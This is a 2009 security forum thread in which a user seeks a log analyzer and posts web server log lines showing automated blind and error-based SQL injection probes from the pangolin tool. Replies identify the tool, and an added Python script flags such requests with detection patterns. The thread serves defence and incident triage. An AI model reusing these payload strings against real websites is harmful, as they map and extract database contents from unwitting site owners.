-
May 11th, 2009, 12:10 PM
#1
Junior Member
Log analyzer
Hello,
I am looking for a log analyzer that I can use to narrow down errors, SQL injection and XSS (any form of attacks).
Thx in advance
-
May 11th, 2009, 02:40 PM
#2
demonize....you will probably get way more responses if you give us more info....like where these logs are??
Operating system, router, etc
I know that some people have all logs copied to a specific machine to then analyze??
How big are these logs???
MLF
Last edited by morganlefay; May 11th, 2009 at 03:45 PM.
How people treat you is their karma- how you react is yours-Wayne Dyer
-
May 11th, 2009, 04:35 PM
#3
Junior Member
The log file size is 22.9 MB
Part of the log:
Code:
+and+1=convert(nvarchar,CHAR(+127+))%2B(select+@@servername)
+having+1=1--
id0=0%20/*!39999%20and%201=2*/--%20and%201=1 HTTP/1.1" 200 12371 "-" "pangolin/0.1"
id0=0%20and%20(select%20length(database())%20%20)%3C=32%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E16%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E24%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E28%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E30%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E31%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3C=256%20and%201=1 HTTP/1.1"
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E128%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E192%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E224%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E240%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E248%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E252%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E254%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E255%20and%201=1 HTTP/1.1" 200
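As an added example (not part of any post in this thread), this Python script shows the kind of check a log analyzer applies to the excerpt above: it URL-decodes each query string, tags SQL injection patterns and the pangolin/0.1 user agent, and counts flagged requests per client. The Combined Log Format layout, the path /item.php, the IP addresses and the signature list are assumptions of the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Combined Log Format: ip - - [time] "METHOD uri PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"')

# Heuristic signatures chosen for this example to match the excerpt above.
SIGNATURES = {
    "sqli-boolean": re.compile(r"\b(and|or|having)\s+\d+\s*=\s*\d+", re.I),
    "sqli-subselect": re.compile(r"\(\s*select\b", re.I),
    "sqli-function": re.compile(r"\b(ascii|substr|length|convert|char)\s*\(|@@\w+", re.I),
    "sqli-comment": re.compile(r"/\*|--(\s|$)"),
}
SCANNER_AGENT = re.compile(r"pangolin", re.I)

def classify(line):
    """Return (ip, decoded_query, tags) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m["uri"].partition("?")[2]
    # Decode twice so double-encoded payloads (%2520) are normalized as well.
    decoded = unquote_plus(unquote_plus(query))
    tags = sorted(n for n, rx in SIGNATURES.items() if rx.search(decoded))
    if SCANNER_AGENT.search(m["agent"]):
        tags.append("scanner-agent")
    return (m["ip"], decoded, tags) if tags else None

def summarize(lines):
    """Count flagged requests per client; a burst points to an automated tool."""
    hits = (classify(line) for line in lines)
    return Counter(h[0] for h in hits if h)

def make_line(ip, query, agent):
    # Constructed log line: only the query and agent strings come from the excerpt.
    return (f'{ip} - - [11/May/2009:16:30:00 +0000] '
            f'"GET /item.php?{query} HTTP/1.1" 200 12371 "-" "{agent}"')

SAMPLE = [
    make_line("203.0.113.7", "id0=0%20/*!39999%20and%201=2*/--%20and%201=1", "pangolin/0.1"),
    make_line("203.0.113.7", "id0=0%20and%20(select%20length(database())%20%20)%3E16%20and%201=1", "pangolin/0.1"),
    make_line("203.0.113.7", "id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E128%20and%201=1", "pangolin/0.1"),
    make_line("198.51.100.20", "id0=42", "Mozilla/5.0"),
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The signatures are deliberately narrow and will miss other encodings and payload styles; on a real log, review the per-client counts first and then read the decoded queries for the noisiest clients.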
-
May 11th, 2009, 06:10 PM
#4
The tool you use will depend on the APPLICATION that is logging the events....
there are ISA, SQL, Exchange, Event, Syslog, IIS, log analyzers
using Google and being a little more specific will really help in your search.
Looks like a bot
http://www.google.com/search?q=pango...e=utf8&oe=utf8
MLF
Last edited by morganlefay; May 11th, 2009 at 06:14 PM.
How people treat you is their karma- how you react is yours-Wayne Dyer
-
May 11th, 2009, 07:22 PM
#5
yup. looks like pangolin. sql injection bot. skiddie stuff
In God We Trust....Everything else we backup.
-
May 12th, 2009, 12:08 AM
#6
Originally Posted by Cheap Scotch Ron
sql injection bot. skiddie stuff
It ain't a sql bot, it's a browser based bot
http://www.botsvsbrowsers.com/details/144772/index.html
Test drive it here:
http://www.botsvsbrowsers.com/Simula...ngolin%2F0%2E1
Check your directories and make sure everything is how it is supposed to be, also re-check your chmod permission settings.
-
May 12th, 2009, 02:54 AM
#7
It ain't a sql bot, it's a browser based bot
WTF?
pangolin is a pen program you initiate from a GUI that runs a bunch of automated dynamic SQL that attempts a SQL injection hack on a variety of websites. You tell it which DBMS and point it to a bunch of websites and it attempts to compromise the DBMS.
Early versions (as referenced above) also contained a backdoor that sent the logs home to China.
http://www.nosec.org/en/pangolin.html
If it walks and smells like a duck, it's a duck.
Call it what you like.
Scotty, beam me up...
In God We Trust....Everything else we backup.
-
May 12th, 2009, 04:20 AM
#8
Correct..
Thanks for the correction CSR
The "tool" that I was thinking of is something completely different.
also thanks for the little tidbit of info.
Originally Posted by Cheap Scotch Ron
If it walks and smells like a duck, it's a duck.
Call it what you like.
Scotty, beam me up...